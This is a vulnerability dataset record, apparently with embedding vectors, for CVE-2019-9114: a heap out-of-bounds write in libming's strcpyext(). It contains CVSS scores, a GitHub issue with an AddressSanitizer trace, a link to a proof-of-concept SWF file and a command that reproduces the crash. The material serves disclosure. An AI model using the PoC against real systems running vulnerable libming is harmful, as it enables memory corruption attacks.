-0.011952996253967285, -0.006174133624881506, 0.004885550122708082, -0.0018123176414519548, -0.027400188148021698, -0.00447051553055644, -0.005529841873794794, 0.00928096380084753, 0.001648280187509954, -0.00881454348564148, -0.0018627147655934095, -0.0023241937160491943, 0.0037214767653495073, 0.0057670040987432, -0.003201695391908288, -0.0008409391157329082, 0.013660566881299019, 0.013241579756140709, -0.022198420017957687, 0.006348052527755499, 0.00028508921968750656, -0.007118831388652325, 0.007774981204420328, -0.0038104127161204815, 0.0034151417203247547, -0.0033301583025604486, -0.003567320993170142, 0.017376113682985306, 0.01671205833554268, 0.001923981704749167, -0.017138952389359474, 0.005197814200073481, -0.006529877427965403, 0.004095007665455341, 0.006996297277510166, -0.0029783672653138638, -0.0025297345127910376, -0.0010662436252459884, 0.009684139862656593, 0.023257747292518616, -0.009921303018927574, -0.017059898003935814, -0.00511875981464982, 0.0014526210725307465, -0.022087745368480682, -0.010205897502601147, 0.018071791157126427, -0.00026038478245027363, -0.01046677678823471, 0.014806852675974369, -0.013344350270926952, -0.0279377568513155, -0.016079625114798546, 0.01400840561836958, 0.002672032220289111, -0.009676234796643257, 0.0059369709342718124, 0.00736785214394331, -0.00939163938164711, 0.010419344529509544, 0.0022095651365816593, 0.01442739274352789, 0.020822877064347267, -0.00855366513133049, 0.019747739657759666, -0.007478527724742889, 0.010095221921801567, 0.0163325984030962, -0.00932049099355936, 0.011391711421310902, 0.022356528788805008, 0.006348052527755499, -0.009707855992019176, -0.0020514565985649824, -0.0023538388777524233, 0.018135035410523415, -0.034246280789375305, -0.005893491208553314, -0.0058421059511601925, 0.010213803499937057, 0.011794887483119965, 0.013597323559224606, 0.00567213911563158, -0.005091090686619282, -0.014356243424117565, 0.0039250412955880165, 0.003089043078944087, -0.004118724260479212, -0.007253223564475775, 0.008371840231120586, -0.015352326445281506, 0.009652518667280674, 0.00412267679348588, 0.06169390305876732, -0.0012500446755439043, 0.007664305157959461, 0.003679973306134343, 0.0006255164043977857, 0.013502458110451698, 0.011336373165249825, -0.007466669660061598, -0.00920190941542387, 0.01694922149181366, -0.003632540814578533, 0.004276832565665245, 0.0033598036970943213, -0.01864098198711872, -0.006178086157888174, 0.004114771261811256, -0.006083221174776554, -0.007988427765667439, -0.023479098454117775, -0.011431237682700157, -0.01756584458053112, -0.01023751962929964, 0.010103126987814903, 0.008877786807715893, 0.0028716439846903086, 0.011399616487324238, -0.017518412321805954, -0.0008725607767701149, 0.012126915156841278, -0.013273200951516628, 0.017233816906809807, 0.0034151417203247547, -0.005276868119835854, 0.009976640343666077, -0.0026661031879484653, 0.015802934765815735, -0.02083868905901909, 0.02755829691886902, -0.012711916118860245, -0.009336302056908607, 0.0027293465100228786, -0.011786982417106628, -0.0021146999206393957, 0.013668471947312355, 0.02779545821249485, 0.0036938076373189688, -0.009921303018927574, -0.011312657035887241, 0.011739549227058887, -0.02121814899146557, -0.006770992651581764, 0.00844298955053091, -0.004181967582553625, 0.00765244709327817, 0.0016670555341988802, -0.03269682079553604, 0.00260681239888072, -0.021961258724331856, 0.000652691291179508, -0.015478813089430332, -0.0015652732690796256, -0.025297345593571663, -0.003270867746323347, 0.009233531542122364, -0.021107472479343414, 0.009288868866860867, 0.016980843618512154, 0.014340433292090893, 0.0010197992669418454, 0.00858528632670641, 0.009747383184731007, -0.022815043106675148, -0.021123284474015236, -0.010561642237007618, -0.018909765407443047, -0.022862475365400314, 0.012980700470507145, -0.012759348377585411, -0.021898014470934868, 0.02436450682580471, 0.005668186582624912, -0.020791256800293922, -0.004624670837074518, 0.0015494624385610223, -0.012466847896575928, -0.006695891264826059, -0.017138952389359474, 0.00808724481612444, -0.0179453045129776, 0.026751942932605743, -0.00530848978087306, 0.013043943792581558, -0.02167666330933571, -0.00917028822004795, 0.0006689961883239448, 0.010648601688444614, 0.0040554809384047985, 0.024253830313682556, 0.006577309686690569, 0.0070793041959404945, -0.011652589775621891, 0.007182074710726738, -0.0053677805699408054, -0.00962880253791809, -0.005743287969380617, -0.019795173779129982, -0.02061733603477478, -0.008869881741702557, -0.010522115044295788, -0.009209814481437206, -0.011676305904984474, 0.022815043106675148, -0.011968806385993958, 0.012996511533856392, 0.006122748367488384, 0.015629015862941742, -0.012711916118860245, 0.0010168347507715225, -0.0067354184575378895, 0.012846308760344982, -0.012838402763009071, 0.000052743976993951946, 0.03434114530682564, 0.002444751327857375, 0.000025476452719885856, -0.010593263432383537, 0.002853856887668371, 0.029803436249494553, 0.016901789233088493, -0.014569690451025963, 0.007782886736094952, -0.00954974815249443, -0.019826794043183327, -0.003992237150669098, 0.0011354159796610475, 0.01864098198711872, 0.0025139236822724342, 0.021660853177309036, 0.007431095466017723, -0.003612777218222618, -0.014261378906667233, 0.04360629990696907, -0.013407593593001366, 0.003091019345447421, -0.008522043004631996, 0.0051780506037175655, -0.012506375089287758, -0.01587408408522606, -0.00821373239159584, 0.0014605264877900481, 0.020712202414870262, -0.008435083553195, 0.014957055449485779, 0.0077433595433831215, -0.007292750291526318, 0.012656577862799168, 0.001305382582359016, 0.008197921328246593, -0.0024170824326574802, -0.0056128487922251225, -0.0023439570795744658, 0.0007445918163284659, -0.008537854067981243, 0.013929351232945919, -0.004604907240718603, 0.013834485784173012, -0.00452585332095623, 0.0003085584321524948, 0.034562498331069946, 0.007790791802108288, -0.0056128487922251225, 0.012111104093492031, 0.021565986797213554, -0.016142869368195534, 0.017202194780111313, 0.006699843797832727, -0.003796578152105212, 0.000812776037491858, 0.012870024889707565, 0.010980629362165928, 0.0024170824326574802, -0.005391496699303389, -0.033708713948726654, -0.014474825002253056, 0.010379817336797714, 0.002768873469904065, -0.018135035410523415, -0.0008602085872553289, 0.016087530180811882, 0.020807066932320595, 0.0003705665876623243, -0.020585715770721436, 0.006466634105890989, -0.008269069716334343, -0.029360732063651085, 0.012095293030142784, 0.021423690021038055, -0.026609646156430244, 0.020285308361053467, -0.018293142318725586, -0.004041646141558886, -0.009873869828879833, 0.005968592595309019, -0.0006240341463126242 ]
1,714
CVE-2019-9114
2019-02-25T04:29:00.497000
Ming (aka libming) 0.4.8 has an out of bounds write vulnerability in the function strcpyext() in the decompile.c file in libutil.a.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/170
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
An Out Of Bound Write bug was found in function strcpyext() in decompile.c . Details with asan output is as below: ``` ==30836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x000000410767 bp 0x7fff7361f360 sp 0x7fff7361f350 WRITE of size 1 at 0x60300000ee18 thread T0 #0 0x410766 in strcpyext /src/libming-afl/util/decompile.c:259 #1 0x41164a in getName /src/libming-afl/util/decompile.c:418 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x401998 in _start (/src/fuzz/swftocxx+0x401998) 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) allocated by thread T0 here: #0 0x7f0d41dfd602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x41162f in getName /src/libming-afl/util/decompile.c:417 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/libming-afl/util/decompile.c:259 strcpyext Shadow bytes around the buggy address: 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9dc0: 00 00 00[fa]fa fa fd fd fd fd fa fa fd fd fd fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff9de0: fd fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff9df0: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==30836==ABORTING ``` poc file https://github.com/JsHuang/libming-poc/blob/master/swftocxx/oob_write_decompile_259 to reproduce it ,run swftocxx with oob_write_decompile_259 `./swftocxx oob_write_decompile_259 ` credit: ADLab of Venustech
Out Of Bound Write in function strcpyext()
https://api.github.com/repos/libming/libming/issues/170/comments
1
2019-01-02T06:25:41
2019-03-01T14:19:41Z
https://github.com/libming/libming/issues/170
395,158,669
170
true
This is a GitHub Issue repo:libming owner:libming Title : Out Of Bound Write in function strcpyext() Issue date: --- start body --- An Out Of Bound Write bug was found in function strcpyext() in decompile.c . Details with asan output is as below: ``` ==30836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ee18 at pc 0x000000410767 bp 0x7fff7361f360 sp 0x7fff7361f350 WRITE of size 1 at 0x60300000ee18 thread T0 #0 0x410766 in strcpyext /src/libming-afl/util/decompile.c:259 #1 0x41164a in getName /src/libming-afl/util/decompile.c:418 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x401998 in _start (/src/fuzz/swftocxx+0x401998) 0x60300000ee18 is located 0 bytes to the right of 24-byte region [0x60300000ee00,0x60300000ee18) allocated by thread T0 here: #0 0x7f0d41dfd602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x41162f in getName /src/libming-afl/util/decompile.c:417 #2 0x41705f in decompileGETVARIABLE /src/libming-afl/util/decompile.c:1816 #3 0x41edd2 in decompileAction /src/libming-afl/util/decompile.c:3299 #4 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #5 0x41e83c in decompileSETTARGET /src/libming-afl/util/decompile.c:3169 #6 0x41f292 in decompileAction /src/libming-afl/util/decompile.c:3462 #7 0x41f37d in decompileActions /src/libming-afl/util/decompile.c:3494 #8 0x41f4b3 in decompile5Action /src/libming-afl/util/decompile.c:3517 #9 0x40bb42 in outputSWF_DOACTION /src/libming-afl/util/outputscript.c:1551 #10 0x40e171 in outputBlock /src/libming-afl/util/outputscript.c:2083 #11 0x40f1c7 in readMovie /src/libming-afl/util/main.c:281 #12 0x40f8fc in main /src/libming-afl/util/main.c:354 #13 0x7f0d4149882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/libming-afl/util/decompile.c:259 strcpyext Shadow bytes around the buggy address: 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9dc0: 00 00 00[fa]fa fa fd fd fd fd fa fa fd fd fd fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff9de0: fd fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff9df0: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==30836==ABORTING ``` poc file https://github.com/JsHuang/libming-poc/blob/master/swftocxx/oob_write_decompile_259 to reproduce it ,run swftocxx with oob_write_decompile_259 `./swftocxx oob_write_decompile_259 ` credit: ADLab of Venustech --- end body ---
4,503
[ -0.02498299814760685, 0.02404649555683136, -0.0032867626287043095, 0.010034981183707714, 0.05495106801390648, 0.010359155014157295, -0.028887491673231125, 0.04008229449391365, -0.023182032629847527, 0.038353368639945984, -0.027821319177746773, 0.004524026066064835, 0.008450131863355637, 0.017130786553025246, 0.013262311927974224, 0.008025103248655796, -0.014868773519992828, 0.01571882888674736, -0.02215908281505108, -0.0008874259074218571, 0.017548611387610435, -0.03547182306647301, -0.020732717588543892, 0.04717089608311653, -0.01030152477324009, 0.013197477906942368, -0.006260157097131014, 0.003933309111744165, -0.017721503973007202, 0.025674568489193916, -0.0009392036590725183, -0.0006542008486576378, -0.004192648455500603, -0.013060604222118855, 0.04083149507641792, 0.0005407399730756879, 0.05016770213842392, 0.05451883748173714, -0.021914152428507805, 0.036999043077230453, -0.010179058648645878, -0.08189351856708527, -0.0114469388499856, 0.028772229328751564, -0.002674434334039688, 0.03443446755409241, 0.015891721472144127, -0.022533684968948364, -0.04437579587101936, 0.0385262593626976, 0.0060800607316195965, 0.019752992317080498, -0.0197673998773098, -0.04840996116399765, 0.01385302934795618, 0.015661198645830154, 0.01747657172381878, -0.0029661906883120537, 0.013939475640654564, 0.003047234145924449, -0.026711925864219666, -0.013903455808758736, 0.012037655338644981, 0.002764482516795397, 0.014782327227294445, 0.00734073668718338, -0.013665728271007538, 0.012736430391669273, -0.02538641355931759, 0.014782327227294445, -0.03515485301613808, -0.017779134213924408, -0.003857668722048402, 0.031495291739702225, 0.005842333193868399, -0.03112068958580494, 0.014256445690989494, 0.0073443385772407055, -0.05247294157743454, 0.047199711203575134, -0.027720466256141663, 0.019594507291913033, -0.007171445991843939, 0.03584642335772514, -0.0007221872801892459, 0.006148497108370066, -0.03869915381073952, -0.06425846368074417, -0.029377354308962822, -0.054201867431402206, -0.020170817151665688, 0.020372524857521057, 0.02446432039141655, 0.026827186346054077, 0.011382103897631168, 0.027446718886494637, -0.020041147246956825, -0.006306982133537531, -0.055008698254823685, -0.010330339893698692, -0.001979261403903365, 0.014897589571774006, -0.013867436908185482, 0.004315114114433527, 0.01573323644697666, -0.0003829303605016321, -0.009019237011671066, -0.01978180930018425, 0.040745049715042114, 0.11364814639091492, 0.0029625887982547283, 0.0020332904532551765, -0.0032867626287043095, 0.012714819051325321, 0.003340791678056121, -0.002335852710530162, 0.01937839202582836, 0.008471743203699589, -0.04276213049888611, -0.012577945366501808, 0.003484868910163641, -0.00046780085540376604, -0.018168143928050995, -0.031783442944288254, -0.004545637872070074, 0.009761234745383263, -0.0034362426958978176, -0.02770605869591236, 0.008666247129440308, -0.0011886374559253454, -0.03146647289395332, -0.019104644656181335, 0.031063057482242584, -0.0023538623936474323, -0.007463202346116304, 0.0015524325426667929, -0.01914786919951439, 0.04207056015729904, 0.03385815769433975, 0.009797253645956516, -0.033685263246297836, -0.00674281595274806, 0.00241869711317122, 0.020660679787397385, -0.009076867252588272, 0.014220425859093666, 0.010121427476406097, 0.009898108430206776, 0.0005200288724154234, 0.018038474023342133, -0.009487488307058811, -0.008623024448752403, 0.028959529474377632, 0.02541522867977619, 0.04446224495768547, -0.011439735069870949, 0.014011514373123646, 0.0364515483379364, 0.008932790718972683, -0.046998005360364914, -0.013917863368988037, -0.0182113666087389, 0.01812491938471794, -0.020761534571647644, -0.023239662870764732, -0.03071727231144905, 0.0036883780267089605, -0.008824732154607773, -0.031063057482242584, 0.035644713789224625, 0.020588641986250877, 0.03195633739233017, 0.011987228877842426, 0.007736949250102043, -0.06921471655368805, -0.036278653889894485, -0.010611290112137794, 0.012923730537295341, -0.046075910329818726, -0.025573713704943657, 0.003110267920419574, 0.003650557715445757, 0.009876496158540249, -0.01114437635987997, 0.0046825110912323, -0.005305645056068897, 0.00674281595274806, -0.03881441429257393, 0.02456517331302166, -0.02529996819794178, -0.01979621686041355, 0.004307910334318876, -0.00880312081426382, -0.023037955164909363, 0.04884219169616699, 0.0017946624429896474, -0.044606320559978485, -0.008190792053937912, 0.010755367577075958, 0.01019346620887518, 0.009530710987746716, -0.011583812534809113, -0.03864152356982231, 0.026366138830780983, -0.02894512191414833, -0.00993412733078003, -0.039390724152326584, 0.02613561600446701, 0.001394847990013659, -0.01623750850558281, 0.000994133180938661, -0.014767919667065144, 0.014753512106835842, 0.011526181362569332, -0.002125139581039548, 0.005910769570618868, 0.0009752229670993984, 0.013925068080425262, -0.015776460990309715, -0.015344228595495224, 0.036163393408060074, -0.0039873383939266205, 0.000557849183678627, -0.015286597423255444, -0.06028192862868309, -0.009271372109651566, -0.024536358192563057, 0.005431713070720434, -0.03495314344763756, -0.0066995928063988686, 0.019104644656181335, -0.028584929183125496, -0.018268996849656105, 0.022404015064239502, 0.03676851838827133, 0.0047257342375814915, 0.0037712224293500185, 0.010445601306855679, -0.03901612386107445, 0.013701748102903366, -0.019291946664452553, 0.021179357543587685, -0.0006956230499781668, -0.010921056382358074, 0.011648646555840969, 0.042329899966716766, -0.04045689478516579, -0.01727486401796341, -0.02581864595413208, 0.019436022266745567, -0.01384582556784153, 0.007041776552796364, 0.010892241261899471, 0.0005474936333484948, 0.012116897851228714, -0.033886972814798355, 0.016583293676376343, 0.013665728271007538, -0.04088912904262543, -0.016799408942461014, 0.03028504177927971, 0.013838620856404305, -0.02218789793550968, 0.03717193379998207, -0.009588342159986496, -0.011886374093592167, -0.005305645056068897, 0.015776460990309715, 0.007758560590445995, -0.016914671286940575, 0.018470704555511475, -0.05601724237203598, -0.015805276110768318, -0.004055775236338377, -0.012455479241907597, -0.004949054215103388, 0.016468031331896782, 0.0033281848300248384, 0.0007388461963273585, -0.038266923278570175, -0.00899762474000454, 0.034722622483968735, -0.005719867534935474, 0.015430674888193607, 0.018773267045617104, -0.033800527453422546, 0.00718585355207324, 0.008839140646159649, -0.016914671286940575, -0.01757742650806904, 0.0021269405260682106, -0.009220944717526436, -0.04379948973655701, 0.011850355193018913, -0.010524843819439411, 0.03800758346915245, 0.0013723359443247318, -0.006234943866729736, -0.019608914852142334, -0.00736955227330327, 0.010236689820885658, -0.01864359900355339, -0.007492017932236195, -0.03417512774467468, -0.02155395969748497, 0.007265096064656973, -0.0037964358925819397, 0.004750947933644056, -0.017145194113254547, -0.014897589571774006, 0.05048467218875885, -0.023037955164909363, 0.0027140555903315544, 0.005175975617021322, -0.01747657172381878, -0.016885856166481972, 0.016367176547646523, -0.01999792456626892, -0.008918383158743382, -0.00241869711317122, -0.0343192033469677, -0.006029633339494467, -0.04123491421341896, 0.003200316336005926, 0.0265534408390522, 0.007218271028250456, -0.027547573670744896, 0.03976532444357872, -0.048237066715955734, 0.017346901819109917, -0.022879470139741898, -0.00999896228313446, -0.029737547039985657, -0.04184003919363022, -0.023657487705349922, -0.019291946664452553, 0.0007311921217478812, 0.025645753368735313, 0.024104125797748566, 0.010993095114827156, -0.031495291739702225, 0.04019755870103836, -0.009545118547976017, 0.008723878301680088, -0.030630826950073242, -0.019032606855034828, 0.014926404692232609, 0.0037243973929435015, 0.0223896075040102, -0.002685240004211664, 0.0009833272779360414, 0.006526700221002102, 0.055210407823324203, 0.00931459479033947, 0.006310584023594856, -0.013809805735945702, -0.026884818449616432, -0.0012723823310807347, -0.0024889346677809954, 0.012513110414147377, -0.013838620856404305, -0.010431193746626377, 0.004740141797810793, 0.0020603048615157604, 0.026466993615031242, 0.008471743203699589, 0.025127075612545013, 0.020372524857521057, 0.002557371510192752, -0.004786967299878597, -0.03308013826608658, 0.05281872674822807, -0.00885354820638895, 0.04561486095190048, 0.002335852710530162, -0.02486773580312729, 0.01436450332403183, 0.006368215195834637, -0.03682614862918854, 0.03143765777349472, 0.002020683605223894, -0.009357818402349949, 0.019695362076163292, -0.03267672285437584, -0.01020066998898983, 0.007455998566001654, -0.034837882965803146, 0.025227928534150124, -0.004765355493873358, -0.012484295293688774, -0.019911477342247963, 0.044289350509643555, -0.02831118181347847, -0.02622206136584282, -0.01030872855335474, 0.040428079664707184, -0.03091898187994957, -0.027936581522226334, 0.04192648455500603, -0.03901612386107445, 0.009862088598310947, -0.02478129044175148, 0.0510321669280529, 0.02351341024041176, -0.0007730645593255758, 0.023398147895932198, 0.00994133111089468, -0.020214039832353592, 0.03287843242287636, 0.0030292244628071785, 0.011814335361123085, -0.0074271829798817635, -0.012037655338644981, -0.027561981230974197, 0.06990628689527512, 0.015142520889639854, 0.013874640688300133, -0.011418122798204422, -0.034520912915468216, 0.03570234775543213, -0.013406389392912388, -0.015315413475036621, -0.008702266961336136, 0.035241298377513885, 0.029319724068045616, 0.0006492481916211545, -0.0023862796369940042, 0.010496028698980808, 0.014515784569084644, -0.002371872076764703, -0.03296487778425217, 0.01612224616110325, 0.03008333221077919, 0.00874548964202404, -0.029218869283795357, -0.047718390822410583, -0.028138289228081703, -0.06489240378141403, -0.014018718153238297, -0.007729745469987392, -0.0025429637171328068, -0.0024673230946063995, 0.015690013766288757, -0.036393918097019196, -0.012707614339888096, -0.03665325790643692, -0.02018522471189499, -0.014746308326721191, 0.022836245596408844, -0.0229082852602005, -0.030774904415011406, 0.016943486407399178, 0.0016460827318951488, 0.010740960016846657, 0.0024096921551972628, -0.010337543673813343, -0.013305535539984703, -0.008839140646159649, 0.0531068816781044, 0.001558735966682434, -0.0013489234261214733, 0.02498299814760685, -0.04310791939496994, -0.039102569222450256, 0.01697230152785778, 0.05348148196935654, -0.0019234315259382129, -0.04256042465567589, -0.0017037136713042855, -0.028772229328751564, 0.013651320710778236, 0.033886972814798355, -0.0016848035156726837, -0.0280950665473938, 0.011382103897631168, 0.043367255479097366, -0.016424808651208878, -0.029276499524712563, 0.00006883066089358181, -0.02466602809727192, -0.0291324220597744, -0.02934853918850422, -0.03172581270337105, -0.0023592652287334204, 0.044404614716768265, -0.0026834390591830015, -0.013456816785037518, 0.006177312694489956, 0.005543372593820095, 0.030140964314341545, 0.009754030965268612, 0.01295975036919117, -0.008587004616856575, -0.033570002764463425, -0.024593988433480263, -0.007945860736072063, -0.047718390822410583, 0.004098998382687569, 0.038468629121780396, 0.004181842785328627, 0.0023070371244102716, 0.01520015113055706, 0.0322444923222065, -0.0009108384838327765, 0.02531437575817108, -0.03619220852851868, -0.05817839875817299, 0.009530710987746716, -0.0011472152546048164, -0.0275907963514328, -0.025588123127818108, -0.02695685625076294, 0.020545417442917824, -0.04552841559052467, -0.008450131863355637, -0.020214039832353592, 0.029276499524712563, 0.014955219812691212, 0.04028400406241417, 0.007103009149432182, -0.01145414263010025, -0.002831118181347847, 0.001242666388861835, 0.012268179096281528, 0.04849640652537346, -0.01311103068292141, 0.051810186356306076, -0.017563018947839737, -0.014350095763802528, -0.03146647289395332, -0.033051323145627975, -0.011562200263142586, -0.0187444519251585, 0.007063387893140316, -0.027302641421556473, 0.012765245512127876, -0.017865581437945366, -0.009444264695048332, -0.026193246245384216, -0.00512554869055748, -0.025141483172774315, 0.04933205619454384, -0.052530571818351746, 0.013672932051122189, -0.01999792456626892, 0.01800965890288353, -0.01488318108022213, -0.004322317894548178, -0.011605423875153065, 0.0187444519251585, -0.004055775236338377, 0.005377683788537979, 0.013982698321342468, 0.033973418176174164, 0.001118399784900248, 0.0004786066710948944, -0.0135288555175066, -0.0088463444262743, 0.02529996819794178, 0.017519796267151833, 0.015286597423255444, 0.0069589316844940186, -0.0002705951046664268, -0.022735392674803734, 0.011475753970444202, -0.013636913150548935, 0.014602230861783028, 0.022663353011012077, -0.021294619888067245, -0.011374900117516518, 0.012145713903009892, -0.001954047940671444, 0.04717089608311653, -0.004181842785328627, 0.004102600272744894, 0.015373043715953827, 0.0012039456050843, 0.019104644656181335, -0.009811662137508392, -0.04094675928354263, 0.009300187230110168, -0.01384582556784153, -0.008673450909554958, 0.030544379726052284, 0.03771942853927612, -0.03207159787416458, 0.0007577563519589603, 0.012844488024711609, 0.0016154663171619177, -0.027432311326265335, 0.012866099365055561, 0.009437060914933681, -0.007492017932236195, -0.006793242879211903, 0.003495674580335617, 0.015084889717400074, -0.01592053845524788, -0.02643817849457264, 0.015344228595495224, 0.017865581437945366, 0.00455644354224205, 0.05143558233976364, 0.028757821768522263, -0.04215700924396515, -0.021179357543587685, 0.0006222336669452488, 0.020444564521312714, 0.01916227675974369, -0.02102087251842022, 0.01227538287639618, 0.009019237011671066, 0.007564056199043989, 0.011886374093592167, 0.00023952845367603004, 0.00674281595274806, -0.012556334026157856, -0.0010580674279481173, 0.018571559339761734, -0.014436542056500912, 0.0017208228819072247, 0.007477609906345606, -0.034924328327178955, 0.00993412733078003, -0.01570442132651806, -0.000024172337361960672, 0.02404649555683136, -0.026711925864219666, -0.006465467158704996, -0.016813816502690315, -0.01228979043662548, -0.006288972683250904, 0.03235975280404091, 0.013082215562462807, -0.018701229244470596, -0.024421095848083496, 0.030429119244217873, 0.03394460305571556, 0.0010535649489611387, -0.02092001959681511, 0.001807269174605608, -0.015142520889639854, 